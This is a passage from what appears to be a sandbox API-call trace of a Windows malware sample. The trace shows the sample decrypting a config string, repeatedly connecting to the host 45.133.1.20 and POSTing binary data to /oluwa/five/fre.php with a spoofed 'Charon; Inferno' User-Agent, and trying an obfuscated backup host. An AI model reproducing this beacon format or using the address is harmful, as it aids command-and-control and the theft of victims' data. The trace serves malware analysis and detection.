[0315.116] GetProcessHeap () returned 0x6a0000 [0315.116] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0315.116] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0315.117] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0315.124] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0315.124] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0315.132] GetProcessHeap () returned 0x6a0000 [0315.132] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0315.132] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0315.135] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0315.135] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0315.136] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0315.136] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0315.137] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0315.137] GetProcessHeap () returned 0x6a0000 [0315.137] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0315.138] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0315.138] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0315.139] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0315.139] CryptDestroyKey (hKey=0x6ad020) returned 1 [0315.140] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0315.140] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0315.140] GetProcessHeap () returned 0x6a0000 [0315.140] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0315.141] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0315.141] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0315.142] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0315.142] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0315.143] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0315.143] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0315.144] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0315.144] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0315.144] GetProcessHeap () returned 0x6a0000 [0315.144] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0315.144] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0315.144] GetProcessHeap () returned 0x6a0000 [0315.144] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa20 [0315.144] socket (af=2, type=1, protocol=6) returned 0xc14 [0315.145] connect (s=0xc14, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0315.173] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0315.173] GetProcessHeap () returned 0x6a0000 [0315.173] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf278 [0315.173] GetProcessHeap () returned 0x6a0000 [0315.173] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dff48 [0315.174] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0315.174] wvsprintfA (in: param_1=0x6dff48, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0315.174] GetProcessHeap () returned 0x6a0000 [0315.174] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6df328 [0315.175] GetProcessHeap () returned 0x6a0000 [0315.175] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dff48 | out: hHeap=0x6a0000) returned 1 [0315.175] GetProcessHeap () returned 0x6a0000 [0315.175] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4be0 [0315.175] GetProcessHeap () returned 0x6a0000 [0315.175] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dff48 [0315.176] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0315.177] wvsprintfA (in: param_1=0x6dff48, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0315.177] GetProcessHeap () returned 0x6a0000 [0315.177] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0315.177] GetProcessHeap () returned 0x6a0000 [0315.177] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dff48 | out: hHeap=0x6a0000) returned 1 [0315.178] send (s=0xc14, buf=0x6bd460*, len=242, flags=0) returned 242 [0315.178] send (s=0xc14, buf=0x6bb998*, len=159, flags=0) returned 159 [0315.178] GetProcessHeap () returned 0x6a0000 [0315.178] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6da320 [0315.178] recv (in: s=0xc14, buf=0x6da320, len=4048, flags=0 | out: buf=0x6da320*) returned 204 [0315.254] GetProcessHeap () returned 0x6a0000 [0315.255] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0315.256] GetProcessHeap () returned 0x6a0000 [0315.256] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0315.256] GetProcessHeap () returned 0x6a0000 [0315.257] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6df328 | out: hHeap=0x6a0000) returned 1 [0315.257] GetProcessHeap () returned 0x6a0000 [0315.257] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf278 | out: hHeap=0x6a0000) returned 1 [0315.257] closesocket (s=0xc14) returned 0 [0315.258] GetProcessHeap () returned 0x6a0000 [0315.258] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa20 | out: hHeap=0x6a0000) returned 1 [0315.258] GetProcessHeap () returned 0x6a0000 [0315.259] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0315.259] GetProcessHeap () returned 0x6a0000 [0315.259] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0315.259] GetProcessHeap () returned 0x6a0000 [0315.260] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0315.260] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6da320, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1968) returned 0xc14 [0315.262] Sleep (dwMilliseconds=0xea60) [0315.263] GetProcessHeap () returned 0x6a0000 [0315.263] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0315.264] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0315.264] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0315.270] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0315.271] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf168) returned 1 [0315.277] GetProcessHeap () returned 0x6a0000 [0315.277] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0315.278] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0315.278] CryptImportKey (in: hProv=0x6bf168, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad560) returned 1 [0315.279] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0315.280] CryptSetKeyParam (hKey=0x6ad560, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0315.280] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0315.285] CryptSetKeyParam (hKey=0x6ad560, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0315.285] GetProcessHeap () returned 0x6a0000 [0315.286] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0315.287] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0315.287] CryptDecrypt (in: hKey=0x6ad560, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0315.288] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0315.288] CryptDestroyKey (hKey=0x6ad560) returned 1 [0315.289] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0315.289] CryptReleaseContext (hProv=0x6bf168, dwFlags=0x0) returned 1 [0315.289] GetProcessHeap () returned 0x6a0000 [0315.289] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0315.290] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0315.290] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0315.291] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0315.291] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0315.292] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0315.292] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0315.293] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0315.293] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0315.293] GetProcessHeap () returned 0x6a0000 [0315.293] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0315.293] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0315.293] GetProcessHeap () returned 0x6a0000 [0315.294] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0315.294] GetProcessHeap () returned 0x6a0000 [0315.294] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0315.294] GetProcessHeap () returned 0x6a0000 [0315.295] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0315.295] GetProcessHeap () returned 0x6a0000 [0315.295] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0315.296] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0315.296] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0315.301] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0315.302] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0315.308] GetProcessHeap () returned 0x6a0000 [0315.308] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0315.308] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0315.309] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad560) returned 1 [0315.309] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0315.310] CryptSetKeyParam (hKey=0x6ad560, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0315.310] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0315.311] CryptSetKeyParam (hKey=0x6ad560, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0315.311] GetProcessHeap () returned 0x6a0000 [0315.311] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0315.312] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0315.312] CryptDecrypt (in: hKey=0x6ad560, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0315.313] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0315.313] CryptDestroyKey (hKey=0x6ad560) returned 1 [0315.314] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0315.314] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0315.314] GetProcessHeap () returned 0x6a0000 [0315.314] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0315.315] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0315.315] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0315.316] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0315.316] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0315.317] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0315.317] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0315.318] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0315.318] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0315.318] GetProcessHeap () returned 0x6a0000 [0315.318] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0315.318] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0315.318] GetProcessHeap () returned 0x6a0000 [0315.318] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6bab40 [0315.318] socket (af=2, type=1, protocol=6) returned 0xc18 [0315.319] connect (s=0xc18, name=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0315.350] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0315.350] GetProcessHeap () returned 0x6a0000 [0315.350] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf168 [0315.350] GetProcessHeap () returned 0x6a0000 [0315.350] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dff48 [0315.351] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0315.352] wvsprintfA (in: param_1=0x6dff48, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0315.352] GetProcessHeap () returned 0x6a0000 [0315.352] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6df028 [0315.352] GetProcessHeap () returned 0x6a0000 [0315.352] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dff48 | out: hHeap=0x6a0000) returned 1 [0315.352] GetProcessHeap () returned 0x6a0000 [0315.353] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0315.353] GetProcessHeap () returned 0x6a0000 [0315.353] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dff48 [0315.353] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0315.354] wvsprintfA (in: param_1=0x6dff48, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0315.354] GetProcessHeap () returned 0x6a0000 [0315.354] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0315.354] GetProcessHeap () returned 0x6a0000 [0315.355] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dff48 | out: hHeap=0x6a0000) returned 1 [0315.356] send (s=0xc18, buf=0x6bd460*, len=242, flags=0) returned 242 [0315.356] send (s=0xc18, buf=0x6bb998*, len=159, flags=0) returned 159 [0315.356] GetProcessHeap () returned 0x6a0000 [0315.356] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6da320 [0315.356] recv (in: s=0xc18, buf=0x6da320, len=4048, flags=0 | out: buf=0x6da320*) returned 204 [0315.425] GetProcessHeap () returned 0x6a0000 [0315.425] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0315.425] GetProcessHeap () returned 0x6a0000 [0315.426] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0315.426] GetProcessHeap () returned 0x6a0000 [0315.426] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6df028 | out: hHeap=0x6a0000) returned 1 [0315.426] GetProcessHeap () returned 0x6a0000 [0315.428] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf168 | out: hHeap=0x6a0000) returned 1 [0315.429] closesocket (s=0xc18) returned 0 [0315.459] GetProcessHeap () returned 0x6a0000 [0315.459] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bab40 | out: hHeap=0x6a0000) returned 1 [0315.459] GetProcessHeap () returned 0x6a0000 [0315.459] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0315.459] GetProcessHeap () returned 0x6a0000 [0315.460] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0315.460] GetProcessHeap () returned 0x6a0000 [0315.460] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0315.461] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6da320, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x196c) returned 0xc18 [0315.463] Sleep (dwMilliseconds=0xea60) [0315.464] GetProcessHeap () returned 0x6a0000 [0315.464] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0315.465] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0315.465] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0315.472] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0315.472] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf058) returned 1 [0315.486] GetProcessHeap () returned 0x6a0000 [0315.486] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0315.487] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0315.487] CryptImportKey (in: hProv=0x6bf058, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0315.488] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0315.488] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0315.489] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0315.490] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0315.490] GetProcessHeap () returned 0x6a0000 [0315.491] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0315.492] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0315.492] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0315.493] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0315.493] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0315.494] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0315.495] CryptReleaseContext (hProv=0x6bf058, dwFlags=0x0) returned 1 [0315.495] GetProcessHeap () returned 0x6a0000 [0315.495] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0315.496] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0315.496] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0315.499] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0315.499] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0315.500] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0315.500] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0315.501] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0315.502] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0315.502] GetProcessHeap () returned 0x6a0000 [0315.502] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3490 [0315.502] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0315.502] GetProcessHeap () returned 0x6a0000 [0315.503] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3490 | out: hHeap=0x6a0000) returned 1 [0315.504] GetProcessHeap () returned 0x6a0000 [0315.504] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0315.504] GetProcessHeap () returned 0x6a0000 [0315.505] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0315.505] GetProcessHeap () returned 0x6a0000 [0315.505] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0315.506] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0315.507] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0315.515] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0315.515] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0315.521] GetProcessHeap () returned 0x6a0000 [0315.521] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0315.522] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0315.522] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: 